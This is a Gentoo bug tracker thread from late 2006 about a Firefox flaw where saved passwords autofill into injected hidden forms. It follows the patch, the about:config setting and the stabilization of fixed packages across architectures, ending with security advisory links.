2.0 is still ~x86, but this is stupid enough and easily exploitable enough that it warrants a bug of its own. Also: http://www.info-svc.com/news/11-21-2006/ Firefox will automatically fill-in site passwords for login forms that are not from the original site. Since the forms don't have to be visible, usernames and passwords can be discovered transparent to the user. It does require the attacker have some way to inject user-created HTML with form tags into the trusted site, which is easily accomplished on sites such as MySpace where user-created HTML is the norm.
(In reply to comment #0) > 2.0 is still ~x86, but this is stupid enough and easily exploitable enough that > it warrants a bug of its own. Also affects older versions, at least 1.7.0.8
I guess you mean 1.5.0.8. So I read, unconfirmed from my side, though ... (ranting censored)
Created attachment 103079 [details] new patchset that includes a patch from upstream. This is a new patchset with patch from upstream it is sane. I have changed the default to false so users must now make the change to true if they wish to keep the current method of auto filling username and passwords that are saved.
Mozilla-firefox-2.0-r2 is in the tree now with Jory's patch.
So this patch disables auto-filling of username/password fields (ie, it turns the feature off, it doesn't replace the old vulnerable method with a new one)? And if we wanted to re-enable auto-fill, which option do we change from false to true in about:config?
(In reply to comment #5) > And if we wanted to re-enable auto-fill, which option do we change from false > to true in about:config? > simple change signon.autofillForums to true :)
*** Bug 157035 has been marked as a duplicate of this bug. ***
what about 1.5.x.x, is this branch unaffected? btw, it seems like we may not enable official branding with that patch ... lol
(In reply to comment #6) > (In reply to comment #5) > > And if we wanted to re-enable auto-fill, which option do we change from false > > to true in about:config? > > > simple change signon.autofillForums to true :) > Perhaps there should be a way to enable it per-site. For example, sites that users can be explicitly allowed to autofill forms, but all the others are explicitly denied this right. Just a thought, seems like it would work to me, but IANAP.
MFSA 2006-75 RSS Feed-preview referrer leak MFSA 2006-73 Mozilla SVG Processing Remote Code Execution MFSA 2006-72 XSS by setting img.src to javascript: URI MFSA 2006-71 LiveConnect crash finalizing JS objects MFSA 2006-70 Privilege escallation using watch point MFSA 2006-69 CSS cursor image buffer overflow (Windows only) MFSA 2006-68 Crashes with evidence of memory corruption (rv:1.8.0.9/1.8.1.1) Ebuilds are not in tree at the moment ... I am working on them and will be avaliable soon.
Wielding the handy "Add Arch's" button on behalf of Anarchy. Target *stable* version 1.5.0.9 2.0.0.1 is on its way for ~arch.
actually adding arches - sorry for bugspam... *shrug*
mozilla-firefox-bin-1.5.0.9 done on AMD64.
www-client/mozilla-firefox-1.5.0.9 Stable for HPPA.
In x86, bin version: Emerges and works fine. Portage 2.1.1-r2 (default-linux/x86/2006.1/desktop, gcc-4.1.1, glibc-2.4-r4, 2.6 .18-gentoo-r4 i686) ================================================================= System uname: 2.6.18-gentoo-r4 i686 AMD Athlon(tm) Processor Gentoo Base System version 1.12.6 Last Sync: Wed, 20 Dec 2006 09:50:01 +0000 distcc 2.18.3 i686-pc-linux-gnu (protocols 1 and 2) (default port 3632) [disable d] app-admin/eselect-compiler: [Not Present] dev-java/java-config: [Not Present] dev-lang/python: 2.4.3-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: [Not Present] dev-util/confcache: [Not Present] sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.60 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.14 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="x86" AUTOCLEAN="yes" CBUILD="i686-pc-linux-gnu" CFLAGS="-march=athlon-tbird -mtune=athlon-tbird -O2 -pipe -fomit-frame-pointer" CHOST="i686-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/share/X11/xkb" CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/terminfo" CXXFLAGS="-march=athlon-tbird -mtune=athlon-tbird -O2 -pipe -fomit-frame-pointe r" DISTDIR="/usr/portage/distfiles" FEATURES="autoconfig collision-protect distlocks metadata-transfer sandbox sfper ms strict" GENTOO_MIRRORS="ftp://ftp.belnet.be/mirror/rsync.gentoo.org/gentoo/ " LC_ALL="en_US.ISO-8859-15" MAKEOPTS="-j2" PKGDIR="/tmp/lea/var/tmp/binpkgs" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude='/d istfiles' --exclude='/local' --exclude='/packages'" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/usr/local/portage /usr/portage/local/layman/sunrise" SYNC="rsync://rsync.belnet.be/packages/gentoo-portage" USE="x86 X bitmap-fonts bzip2 cairo cdr cli cracklib crypt dbus dlloader dri dvd dvdr eds elibc_glibc emboss encode fam firefox fortran gif gnome gpm gstreamer gtk hal iconv input_devices_evdev input_devices_keyboard input_devices_mouse isd nlog jpeg kde kernel_linux ldap libg++ mad mikmod mp3 mpeg ncurses nptl nptlonly ogg opengl pam pcre perl png ppds pppd python qt3 qt4 quicktime readline reflec tion sdl session spell spl ssl tcpd truetype truetype-fonts type1-fonts udev uni code userland_GNU video_cards_vesa vorbis win32codecs xml xorg xv zlib" Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LDFLAGS, LINGUAS, PORT AGE_RSYNC_EXTRA_OPTS
sparc stable.
any reason why AMD64 and HPPA were not removed from the Cc list ?
don't forget -bin
(In reply to comment #17) > any reason why AMD64 and HPPA were not removed from the Cc list ? Because the summary contradicts what you wanted stabilised.
www-client/mozilla-firefox-bin-1.5.0.9 1. emerges on x86 2. passes collision test 3. works www-client/mozilla-firefox-1.5.0.9 1. emerges on x86, please note: unpack mozilla-firefox-1.5.0.9-de.xpi: file format not recognized. Ignoring. dodoc: LEGAL does not exist 2. passes collision test 3. works Portage 2.1.1-r2 (default-linux/x86/2006.1/desktop, gcc-4.1.1, glibc-2.4-r4, 2.6.18.4 i686) ================================================================= System uname: 2.6.18.4 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz Gentoo Base System version 1.12.6 Last Sync: Wed, 20 Dec 2006 18:30:01 +0000 ccache version 2.3 [disabled] app-admin/eselect-compiler: [Not Present] dev-java/java-config: 1.3.7, 2.0.30 dev-lang/python: 2.3.5-r3, 2.4.3-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: 2.3 dev-util/confcache: [Not Present] sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.60 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.14 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="x86" AUTOCLEAN="yes" CBUILD="i686-pc-linux-gnu" CFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer" CHOST="i686-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config /usr/kde/3.5/shutdown /usr/share/X11/xkb /usr/share/config /var/qmail/alias /var/qmail/control" CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf /etc/java-config/vms/ /etc/revdep-rebuild /etc/terminfo /etc/texmf/web2c" CXXFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer" DISTDIR="/usr/portage/distfiles" EMERGE_DEFAULT_OPTS="--nospinner" FEATURES="autoconfig collision-protect distlocks metadata-transfer parallel-fetch sandbox sfperms strict test userfetch userpriv usersandbox" GENTOO_MIRRORS="http://mirror.switch.ch/mirror/gentoo/ http://gentoo.inode.at/" LINGUAS="en de en_GB de_CH" MAKEOPTS="-j3" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude='/distfiles' --exclude='/local' --exclude='/packages'" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" SYNC="rsync://rsync.gentoo.org/gentoo-portage" USE="x86 X a52 aac acpi alsa apache2 asf berkdb bitmap-fonts cairo cdr cdrom cli cracklib crypt cups dbus divx dlloader dri dts dvd dvdr dvdread eds elibc_glibc emboss encode fam ffmpeg firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal iconv input_devices_keyboard input_devices_mouse ipv6 isdnlog java jpeg kde kdeenablefinal kernel_linux ldap libg++ linguas_de linguas_de_CH linguas_en linguas_en_GB mad mikmod mmx mono mp3 mpeg ncurses nls nptl nptlonly ogg opengl oss pam pcre perl png ppds pppd python qt3 qt4 quicktime readline reflection rtsp ruby samba sdl session smp spell spl sse sse2 sse3 ssl svg tcpd test tetex theora threads truetype truetype-fonts type1-fonts udev unicode userland_GNU vcd video_cards_fbdev video_cards_i810 video_cards_vesa vorbis win32codecs wxwindows x264 xine xml xorg xprint xv xvid zlib" Unset: CTARGET, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_RSYNC_EXTRA_OPTS, PORTDIR_OVERLAY
ppc stable
x86 done.
This is ready for glsa ...
Removing amd64 from CC: 19 Dec 2006; <malc@gentoo.org> mozilla-firefox-1.5.0.9.ebuild: Stable on amd64 wrt security bug #156023
rerating due to MFSA 2006-73 (at least) sorry for the delay in the GLSA (Chrismas holidays, it seems) ----------------- Description Appending an SVG comment DOM node from one document into another type of document such as HTML in some cases results in a crash due to memory corruption that can be exploited to run arbitrary code. This flaw was introduced in the Firefox 1.5.0.4 release, prior versions are unaffected. Mozilla would like to thank an anonymous researcher working with TippingPoint and the Zero Day Initiative for reporting this issue.
added CVE entry for the original bug.
The about:config section is now called signon.prefillForms in 2.0.0.1, in case anybody reading this bug couldn't find it now.
http://www.gentoo.org/security/en/glsa/glsa-200701-02.xml http://www.gentoo.org/security/en/glsa/glsa-200701-03.xml http://www.gentoo.org/security/en/glsa/glsa-200701-04.xml Thank you and goodnight!
arm/ia64 won't stabilize 1.5.